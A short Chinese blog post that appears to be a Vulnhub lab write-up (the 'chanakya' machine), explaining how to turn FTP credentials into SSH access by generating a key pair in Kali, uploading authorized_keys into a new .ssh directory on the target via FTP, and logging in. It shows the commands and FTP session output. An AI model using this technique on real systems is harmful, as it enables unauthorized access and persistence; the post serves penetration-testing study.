通过FTP获得靶机Shell步骤说明

通过FTP获得靶机Shell步骤说明

当已经获取到FTP的用户名和密码,并且该用户有权限上传文件以及创建文件,那么基于此获取Shell的步骤如下:

1.在Kali Linux上利用ssh-keygen命令创建公私钥文件,并将这些文件移动到工作目录,方便后面通过FTP上传

┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:o3qqxP2XtfrtTqjSSy4k1Ikh5+xRym+dW4MT2aWLHqo root@kali
The key's randomart image is:
+---[RSA 3072]----+
|                 |
|  . o .     .    |
|   * * . o o     |
|    O o o o      |
|   o o .S= .     |
| . .o +.B.=.     |
|  o .+.+.B.o.    |
| .   o=o*..o     |
|  ..E+.+=+.o+    |
+----[SHA256]-----+

┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# ls -alh
total 120K
drwxr-xr-x 2 root root 4.0K Feb 12 23:09 .
drwxr-xr-x 9 root root 4.0K Feb 12 22:35 ..
-rw-r--r-- 1 root root 100K Feb 12 23:04 ashoka.pcapng
-rw-r--r-- 1 root root    1 Feb 12 23:08 .bash_history
-rw-r--r-- 1 root root 1.2K Feb 12 22:38 nmap_full_scan
-rw-r--r-- 1 root root   12 Feb 12 23:09 test.txt

┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# ls -alh
total 120K
drwxr-xr-x 2 root root 4.0K Feb 12 23:09 .
drwxr-xr-x 9 root root 4.0K Feb 12 22:35 ..
-rw-r--r-- 1 root root 100K Feb 12 23:04 ashoka.pcapng
-rw-r--r-- 1 root root    1 Feb 12 23:08 .bash_history
-rw-r--r-- 1 root root 1.2K Feb 12 22:38 nmap_full_scan
-rw-r--r-- 1 root root   12 Feb 12 23:09 test.txt
  1. 将id_rsa.pub公钥文件重定向写到authorized_keys文件中

    cat id_rsa.pub > authorized_keys
    
  2. 在靶机的用户家目录,创建.ssh目录,进入该目录

  3. 上传authorized_keys文件到.ssh目录

    ftp> mkdir .ssh
    257 "/.ssh" directory created.
    ftp> cd .ssh
    250 "/.ssh" is the current directory.
    ftp> put authorized_keys 
    local: authorized_keys remote: authorized_keys
    200 Active data connection established.
    125 Data connection already open. Transfer starting.
    226 Transfer complete.
    563 bytes sent in 0.00 secs (8.3894 MB/s)
    ftp> 
    
  4. 修改id_rsa文件权限为400,然后ssh到目标主机


posted @ 2023-02-13 13:39  Jason_huawen  阅读(172)  评论(0编辑  收藏  举报